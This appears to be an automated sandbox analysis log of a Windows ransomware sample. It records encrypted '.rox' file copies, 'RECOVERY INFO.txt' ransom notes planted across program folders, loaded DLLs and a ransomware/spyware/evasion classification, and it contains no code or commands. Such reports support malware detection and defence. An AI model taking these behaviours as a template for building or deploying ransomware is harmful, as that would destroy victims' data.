Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\F7QNLlcY2ODqtyZ0GIv9h7Cm5Yw.br[1].js entropy: 7.99931719268Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\dYw9trBOUuy7sL9xTZGIliMEagg[1].css entropy: 7.99936992218Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\D_0mE1U1YmZvpLaz5wDHB6P-DAI.br[1].js entropy: 7.99898678992Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\EJz06avERkAqfuwcXY6H5w8dtNc[1].css entropy: 7.99952233383Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\H3gIahXaXkGgvztu9ouLmJNXhQM.br[1].js entropy: 7.99887976622Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\Init[1].htm entropy: 7.99845696162Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\Fz9exwO1sXH1v6MZmMHhkkwLSN4.br[1].js entropy: 7.99674184217Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\gYsYMd3hJLlkm0pWl7CInhg245Y.br[1].js entropy: 7.99672418308Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\JClcsxanpxBiLGzKZtauWAccdA0.br[1].js entropy: 7.99558705817Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\k0oGmqG3Bk5KfPcZl898MPlQ1rI.br[1].js entropy: 7.99964478776Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\KF9j9oJUfaaKiX-84yf0U337ge8.br[1].js entropy: 7.99989878946Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Aut2Exe_Aut2exe_exe entropy: 7.99589014366Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Aut2Exe_Aut2exe_x64_exe entropy: 7.99503499012Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Examples entropy: 7.99543807246Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Extras entropy: 7.99479461956Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt v3 Website_url entropy: 7.99471350556Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt3_exe entropy: 7.99526880594Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt3_x64_exe entropy: 7.99469542739Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoItX_AutoItX_chm entropy: 7.99514176801Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt_chm entropy: 7.99542456704Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_WindowsPowerShell_v1_0_powershell_exe entropy: 7.99575141499Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_WindowsPowerShell_v1_0_PowerShell_ISE_exe entropy: 7.99502715647Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{F38BF404-1D43-42F2-9305-67DE0B28FC23}_regedit_exe entropy: 7.99487475903Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_odbcad32_exe entropy: 7.99503807702Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_SciTE_SciTE_exe entropy: 7.99485440166Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Java_jre-1_8_bin_javacpl_exe entropy: 7.99536958349Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c33d893-bc92-487f-aede-304ebfc79509}\Apps.index entropy: 7.99982443547Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3fe51a79-8cd0-4d3b-a6fd-359731ff2630}\0.0.filtertrie.intermediate.txt entropy: 7.99383324575Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c33d893-bc92-487f-aede-304ebfc79509}\0.0.filtertrie.intermediate.txt entropy: 7.99579343296Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{2c33d893-bc92-487f-aede-304ebfc79509}\Apps.ft entropy: 7.99606444169Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{bf4cbd08-393f-4530-b591-d803c6625a41}\0.0.filtertrie.intermediate.txt entropy: 7.99467277153Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3fe51a79-8cd0-4d3b-a6fd-359731ff2630}\Apps.ft entropy: 7.99592141592Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3fe51a79-8cd0-4d3b-a6fd-359731ff2630}\Apps.index entropy: 7.99983697505Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{bf4cbd08-393f-4530-b591-d803c6625a41}\Apps.index entropy: 7.99984754753Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appsglobals.txt entropy: 7.99950817717Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appsconversions.txt entropy: 7.99987487724Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{bf4cbd08-393f-4530-b591-d803c6625a41}\Apps.ft entropy: 7.99636602789Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingsconversions.txt entropy: 7.99964784989Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appssynonyms.txt entropy: 7.99926720825Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{76cc83ea-ae96-47fc-9329-459e5ad2d67b}\0.0.filtertrie.intermediate.txt entropy: 7.99906379928Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingssynonyms.txt entropy: 7.99820171196Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{76cc83ea-ae96-47fc-9329-459e5ad2d67b}\Settings.ft entropy: 7.99909400771Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\User Account Pictures\guest.bmp.rox (copy) entropy: 7.9997140245Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\User Account Pictures\user.bmp.rox (copy) entropy: 7.99969166356Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\USOPrivate\UpdateStore\store.db.rox (copy) entropy: 7.99998577804Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-100634-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99112777195Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-120948-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.9935856747Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-114538-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99535959301Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-125203-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99179545182Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-125739-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.9950928826Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-092906-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99252562177Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-100200-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99494061925Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-093652-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99687282116Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-115204-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy) entropy: 7.99393937985Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\All Users\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe.rox (copy) entropy: 7.99971298097Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeProcess Stats: CPU usage > 49%
Source: 2b7cu0KwZl.exe, 00000000.00000003.1857563152.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1869988449.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1863078857.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1870471666.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1858342512.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1872606843.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1861932147.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1860944488.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1872311644.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1856630196.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1874294884.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1859699836.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1875032579.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1859378727.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1873842753.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1860367018.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1861775046.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1856172882.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1867980419.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1862687819.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: 2b7cu0KwZl.exe, 00000000.00000003.1871936477.000001F7CBF7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exe.muij% vs 2b7cu0KwZl.exe
Source: classification engineClassification label: mal84.rans.spre.spyw.evad.winEXE@1/1281@1/2
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Program Files\7-Zip\Lang\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile created: C:\Documents and Settings\user\Local Settings\Temp\acrobat_sbx\NGL\RECOVERY INFO.txtJump to behavior
Source: 2b7cu0KwZl.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile read: C:\ProgramData\Microsoft OneDrive\setup\refcount.iniJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 2b7cu0KwZl.exeReversingLabs: Detection: 47%
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile written: C:\ProgramData\Microsoft OneDrive\setup\refcount.iniJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\7-Zip\Lang\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\7-Zip\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\CAN\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\DEU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\FRA\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\JPN\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\UK\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\RECOVERY INFO.txtJump to behavior
